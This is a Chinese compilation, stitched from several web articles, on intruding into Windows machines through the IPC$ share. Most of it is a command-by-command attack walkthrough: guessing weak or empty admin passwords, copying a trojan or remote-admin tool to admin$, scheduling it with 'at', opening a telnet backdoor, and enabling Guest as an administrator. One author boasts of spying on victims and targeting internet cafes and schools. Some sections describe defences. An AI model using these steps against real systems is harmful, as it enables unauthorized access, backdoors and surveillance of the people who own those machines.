ipc$
ipc$共享入侵详细教程

ipc$共享入侵详细教程ipc$共享入侵微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。
反而成了黑客入侵nt架构操作系统的一条便利通道。
如果你的操作系统存在不安全的口令,那就更可怕了。
一条典型的入侵流程如下:(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。
如果你的密码位数不高,又很简单,是很容易被破解的。
根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。
(2)使用命令net use \\123.1.1.1\ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。
用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。
这样一来,你的电脑就完全被黑客控制了。
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),当然,给自己的帐户加上强壮的口令才是最关键的。
而且在一般情况下,一些功能对管理员来说也是没有必要的。
如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。
我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一下开了哪些端口,有445哦,(主要是针对2000系统的)netstat -an命令:net view(有的机器用的是win98的系统查不出的)看一下自己的IP再看看用户:于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)命令:net use \\220.160.199.38\ipc$ "" /user:Administrator命令:net use \\ip\ipc$ 密码/user:用户net use \\220.160.199.38\ipc$ "" /user:"zyz"显示命令成功可以用这个命令看下是否成功:net use好了,现在我们给他传个咚咚--我配置好的radmin命令:copy 本地文件远程目录如:copy c:\4899.exe \\192.168.0.200\admin$(这里的$是指admin用户的c:\winnt\system32\)传过去了,我们当然要运行它啊,怎么运行呢?接着看现在我们来看看他机器的时间命令:net time \\192.168.0.200然后用这个命令启动at \\192.168.0.200 时间要运行的文件at \\IP 时间要运行的文件(这个是计划任务里边的一个命令)好了,然后呢,嘿嘿----等!看下我们的后门运行了没有?呵呵,上线了我回头看看是哪个MM or GG?我们看看她在干什么?嘿嘿~OK了吧!至于以后你要做什么,就看你了这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞特别象学校或网吧等地方我试过了,不过,现在偶不搞他好了,到这里了,防范方法在下边,88!防范ipc$入侵:1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LS A]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2.禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
IPC$入侵命令

入侵中可能会用到的命令为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。
请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令1)建立空连接:net use \\127.0.0.1\ipc$ "" /user:""2)建立非空连接:net use \\127.0.0.1\ipc$ "密码" /user:"用户名"3)删除连接:net use \\127.0.0.1\ipc$ /del2 在ipc$连接中对远程主机的操作命令1)查看远程主机的共享资源(看不到默认共享):net view \\127.0.0.12)查看远程主机的当前时间:net time \\127.0.0.13)得到远程主机的netbios用户名列表:nbtstat -A 127.0.0.14)映射/删除远程共享:net use z: \\127.0.0.1\c此命令将共享名为c的共享资源映射为本地z盘net use z: /del删除映射的z盘,其他盘类推5)向远程主机复制文件:copy 路径\文件名\\IP\共享目录名,如:copy c:\xinxin.exe \\127.0.0.1\c$即将c盘下的xinxin.exe复制到对方c盘内当然,你也可以把远程主机上的文件复制到自己的机器里:copy \\127.0.0.1\c$\xinxin.exe c:\6)远程添加计划任务:at \\IP时间程序名如:at \\127.0.0.0 11:00 xinxin.exe注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径3 本地命令1)查看本地主机的共享资源(可以看到本地的默认共享)net share2)得到本地主机的用户列表net user3)显示本地某用户的帐户信息net user 帐户名4)显示本地主机当前启动的服务net start5)启动/关闭本地服务net start 服务名net stop 服务名6)在本地添加帐户net user 帐户名密码/add7)激活禁用的用户net uesr 帐户名/active:yes8)加入管理员组net localgroup administrators 帐户名/add很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
IPC$入侵--远程磁盘映射

IPC$入侵:远程磁盘映射IPC$介绍:IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。
但事实上使用这个功能的黑客可以通过建立IPC$连接与远程主机实现通信和控制。
通过IPC$连接的建立,黑客能够做到:1 建立、拷贝、删除远程计算机文件;2 在远程计算机上执行命令。
的缩写,可以理解为“命名管道”资源,它是Windows操作系统提供的一个通信基础,用来在两台计算机进程之间建立通信连接。
而IPC后面的“$”是Windows系统所使用的隐藏符号,因此“IPC$”表示IPC共享,但是是隐藏的共享。
IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能,通过这项功能,一些网络程序的数据交换可以建立在IPC上面,实现远程访问和管理计算机。
打个比方,IPC连接就像是挖好的地道,通信程序就通过这个IPC地道访问目标主机。
默认情况下IPC是共享的,除非手动删除IPC$。
通过IPC$连接,入侵者就能够实现远程控制目标主机。
因此,这种基于IPC的入侵也常常被简称为IPC入侵。
操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\WINNT\)等,即为ADMIN$、C$、D$、E$等等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。
演示:在MS-DOS中键入“net share”命令来查看本机共享资源。
如何消除默认共享?DOS命令,这些都是DOS中经常使用的命令。
DIR命令:列出当前路径下的文件,常常用来查看想要找的文件是否在该路径下。
CD命令:进入指定的目录。
比如,想进入E盘中的CODE文件夹,则在E:\>下键入“CD CODE”命令。
:系统账号类操作;net localgroup:系统组操作net use:远程连接、映射操作net send:信使命令net time:查看远程主机系统时间cls命令:清屏命令。
ipc$

ipc 管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放 ipc 管道的主机似乎更容易得手。通过 ipc 管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面, ipc 管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的 ipc 管道而一筹莫展大呼救命。当然,我们也不能忽视权限在 ipc 管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么 ipc 管道这把双刃剑将显示出它狰狞的一面。
查看远程主机的共享资源
2 查看远程主机的共享资源 命令: net view \\ip 解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。 在 \\*.*.*.* 的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。
网上关于 ipc$ 入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,我认为这些文章讲解的并不详细,一些内容甚至是错误的,以致对 ipc$ 的提问几乎占了各大安全论坛讨论区的半壁江山,而且这些问题常常都是重复的,严重影响了论坛质量和学习效率,因此通过下面文章,希望能把 ipc$ 这部分东西尽量说清楚。 注意:本文所讨论的各种情况均默认发生在 win NT/2000 环境下, win98 将不在此次讨论之列。
ipc$连接在工作生活中的实际应用(内有连接失败的可行解决办法&使用案例一则!)

概念IPC$(Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC$ 是NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个IP 之间只允许建立一个连接。
NT/2000 在提供了ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$ ……) 和系统目录winnt 或windows(admin$) 共享。
所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
ipc$连接成功后能做什么查看远程主机的共享资源命令:net view \\ip查看远程主机的当前时间命令:net time \\ip得到远程主机的NetBIOS用户名命令:nbtstat -a ip映射远程主机磁盘命令:net use x:\\ip\c$(将远程主机的C盘映射为本机X盘)添加账户、开启服务、关机\重启、复制文件、使用网络注册表、使用计算机管理,等等……还有其他好多功能,在此不一一列举,可在使用中探究。
系统支持Win2000/NT及其以上系统都支持。
命令使用方法与格式在“CMD”命令提示符下使用“net”命令实现。
格式:空连接:net use \\ip\ipc$ "" /user:""带权限连接:net use \\ip\ipc$ "密码" /user:"用户名"删除连接:net use \\ip\ipc$ /del现如今的使用最常见的一个问题在使用ipc$连接时,我们连接的对方是Win2K的话,连接比较方便,只要命令格式没有输错,都能连接使用成功!但若对方是XP\Vista\Win7的话,就算有了对方的IP地址、用户名和密码、必须的系统服务都已启动、命令格式也输对,但还是有可能连接不成功、为什么呢?因为XP及以上系统与2000系统在这个方面有两处不同的地方,仅仅Xp系统的一项权限设置就把你死死的阻止在门外了!需要在被连接方设置,那个权限设置是:本地帐户的共享和安全模式。
IPC$关闭开启

IPC$是不是无法关闭的?2007-6-18 19:59提问者:look_she|悬赏分:5IPC$是不是无法关闭的?是不是用IPC$可以和任何PC连接?!默认共享:在Windows 2000/XP/2003系统中,逻辑分区与Windows目录默认为共享,这是为管理员管理服务器的方便而设,但却成为了别有用心之徒可趁的安全漏洞。
IPC$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者可以与目标主机建立一个空的连接,即无需用户名和密码就能连接主机,当然这样连接是没有任何操作权限的。
但利用这个空的连接,连接者可以得到目标主机上的用户列表。
利用获得的用户列表,就可以猜密码,或者穷举密码,从而获得更高,甚至管理员权限。
只要通过IPC$,获得足够的权限,就可以在主机上运行程序、创建用户、把主机上C、D、E等逻辑分区共享给入侵者,主机上的所有资料,包括QQ密码、email帐号密码、甚至存在电脑里的信用卡资料都会暴露在入侵者面前。
要防止别人用ipc$和默认共享入侵,需要禁止ipc$空连接,避免入侵者取得用户列表,并取消默认共享。
禁止ipc$空连接进行枚举运行regedit,找到如下组键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001关闭139与445端口ipc$连接是需要139或445端口来支持的,139端口的开启表示netbios协议的应用,通过139,445(win2000)端口实现对共享文件/打印机的访问,因此关闭139与445端口可以禁止ipc$连接。
关闭139端口可以通过禁用 netbios 协议来实现。
IPC$详解
一:什么是ipc$
IPC$(Internet Process Connection)是共享 "命名管道 "的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
六:如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
防范ipc$攻击常用方法
防范ipc$攻击常用方法IPC$是Windows系统中的一种共享资源,它允许用户在不需要登录到目标计算机的情况下访问该计算机的资源。
这项功能的存在使得黑客有机会通过IPC$攻击手段获取目标电脑的控制权,威胁到用户的隐私和数据安全。
为了防范IPC$攻击,我们可以采取以下常见方法:1. 禁用IPC$共享IPC$是Windows系统默认开启的一个共享,可以通过它访问目标计算机的资源。
如果我们禁用IPC$共享,黑客就无法使用该方式进行攻击了。
禁用IPC$共享的方法有多种,可以通过修改注册表、关闭服务等方式实现。
其中最常见的方法是在Windows安全策略中禁用IPC$共享。
2. 设置强密码IPC$攻击主要是利用了Windows系统默认的空密码共享漏洞,如果我们设置了强密码,就可以有效地避免IPC$攻击。
强密码应该包含大小写字母、数字和特殊字符,并且长度应该不少于8位。
3. 禁用Guest账户Guest账户是Windows系统默认开启的一个账户,它没有密码限制,可以访问IPC$共享。
为了防范IPC$攻击,我们应该禁用Guest账户,同时建议禁用其他不必要的账户。
4. 安装杀毒软件杀毒软件可以及时发现和清除病毒、木马等恶意软件,有效保护我们的计算机安全。
如果我们安装了杀毒软件,并及时更新病毒库,就可以有效地防范IPC$攻击。
5. 定期更新系统和软件Windows系统和常用软件的更新补丁可以修复系统漏洞和安全隐患,有效提高系统的安全性。
我们应该定期检查系统和软件的更新情况,并及时安装补丁,以保证计算机的安全。
6. 使用防火墙防火墙可以阻止未经授权的访问,有效保护我们的计算机安全。
我们应该开启Windows防火墙,并设置防火墙规则,禁止不必要的入站和出站连接,以防范IPC$攻击等恶意攻击。
7. 关闭不必要的服务和端口Windows系统中有很多不必要的服务和端口,这些服务和端口可能存在安全漏洞,成为黑客攻击的目标。
“恶意”利用IPC$
“恶意”利⽤IPC$“恶意”利⽤IPC$⽬录⽆论是默认共享还是远程计划任务都是管理员级别或是有相对应权限的账户的操作。
何为IPC$IPC$ (Internet Process Connection),共享"命名管道"的资源,它是为了让进程间通信⽽开放的命名管道,通过提供可信任的⽤户名和⼝令,连接双⽅可以建⽴安全的通道并以此通道进⾏加密数据的交换,从⽽实现对远程计算机的访问。
默认共享是管理员级别或者是有相对权限的账户的操作,同时在安全策略中可以对共享模型进⾏修改。
所谓空连接:就是在连接时指定⼀个空的⽤户名和密码net use \\IP\IPC$ "" /user:"",这样的连接是可以建⽴的,但是并没有什么权限。
利⽤IPC$⽹上多数通过IPC$进⾏攻击的例⼦都是通过远程主机开放的默认共享⽂件夹,上传⼀个⽊马⽂件,通过at命令添加计划任务的⽅式执⾏,这样可以直接得到⼀个SYSTEM权限的Shell。
但是这⾥也有⼀个要求,就是IPC$这个默认共享存在,如果对⽅主机把IPC$删除了,那么虽然可以上传⽂件,但是却没有办法通过at命令设置计划任务。
流程记录如下:1. net use \\靶机IP(或者计算机名)\ipc$探测使⽤⾃⼰的⽤户名和密码能不能连到远程主机(默认情况下该命令会使⽤当前⽤户的账户和密码进⾏尝试)2. 拷贝⽊马copy ⽊马⽂件 \\靶机\靶机路径3. at \\靶机IP 时间⽊马win7以后的版本执⾏at命令时执⾏会报:“AT命令已弃⽤,请改⽤schtasks.exe ”,不要理他,⾄少在2012之前的版本(包括2012R2)是能⽤的1. AT命令创建的任务权限为SYSTEM,也就是说shell跑起来就是SYSTEM。
2. AT命令创建的任务⼯作模式是:⽆论⽤户是否登陆都执⾏该计划任务。
3. schtasks这个命令在远程主机上创建任务时,需要⼀个在远程主机Administrators组中的⽤户。
关于计算机中的部分专用词汇解释
关于计算机中的部分专用词汇解释1)什么是IPC:IPC是英文INTERNET PROCE CONNECTION的缩写,在计算机中可以理解为“命名管道”资源,它是WINDOWS操作系统提供的一个通信基础,用来在两台计算机之间产生连接或是联系,实际上它就是在计算机之间相当于安装了一路功能强大的管道。
2)什么是ipc$:ipc$是Windows系统使用的隐藏符号,表示是Windows系统之间的ipc$则表示是IPC共享是隐藏的的共享,通过这项功能,一些网络程序的数据交换就可以建立在IPC上面,从而实现远程管理和访问计算机,但是如果通过ipc$连接也会给入侵者提供实现远程控制目标主机,入侵者也常常被简称为IPC入侵。
3)什么是TLNET::对计算机来说TELNET只是一种通信协议(远程登陆工具),但是入侵者可以利用它来作为一种远程登陆工具实现远程控制目标上的主机上的软件,硬件资源,主要是用来获取远程主机的管理员权限。
4)什么是bit: 通常在数据的传输过程中bit主要是指数据在同一时间周期内传输的数据量,在国际的数据传输过程中对数据量都有一定的规定如8bit,16bit,32bit应该说不同的bit率就是不同的数据包。
5)什么是ping:ping实际上就是拼网络上的ip地址,可以查询本地计算机连接的广域网和局域网上的ip也就是说如果网络连接不上这是最有效的办法之一,这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间,例如:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)6)什么是bat:bat是Windows系统中的用记事本编写的一种文件格式,统称为dos批处理文本格式,也就是说在记事本里写入一系列的dos命令按先后顺序执行其dos命令就会让Windows来执行其命令,相当于利用了dos命令。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Windows下IPC$的应用与删除(2008-04-11 12:54:45)转载▼分类:操作系统标签:杂谈Windows下IPC$的应用与删除2006年10月30日星期一上午 06:39相关命令建立空连接net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)建立非空连接net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 映射默认共享net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$删除一个ipc$连接net use \\IP\ipc$ /del删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认经典入侵模式1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:\>net time \\127.0.0.1查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4.C:\>at \\127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)5.C:\>net time \\127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午11:05,那就准备开始下面的命令。
6.C:\>telnet 127.0.0.1 99这里会用到Telnet命令吧,注意端口是99。
Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools 目录中)。
8.C:\WINNT\system32>ntlm输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm 其实是让这个程序在对方计算机上运行)。
当出现"DONE"的时候,就说明已经启动正常。
然后使用"net start telnet"来开启Telnet服务!9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组10.C:\>net user guest /active:yes将对方的Guest用户激活11.C:\>net user guest 1234将Guest的密码改为1234,或者你要设定的密码12.C:\>net localgroup administrators guest /add将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)ipc$与空连接不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).ipc$与139,445端口ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径 : 网络有问题;错误号53,找不到网络路径: ip地址错误;目标未开机;目标lanmanserver 服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。
(连接域控会出现此情况)错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.如何打开目标的IPC$首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。
从上面可以知道,ipc$能否使用还有很多条件。
请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
如何防范ipc$入侵禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa rameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa rameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师。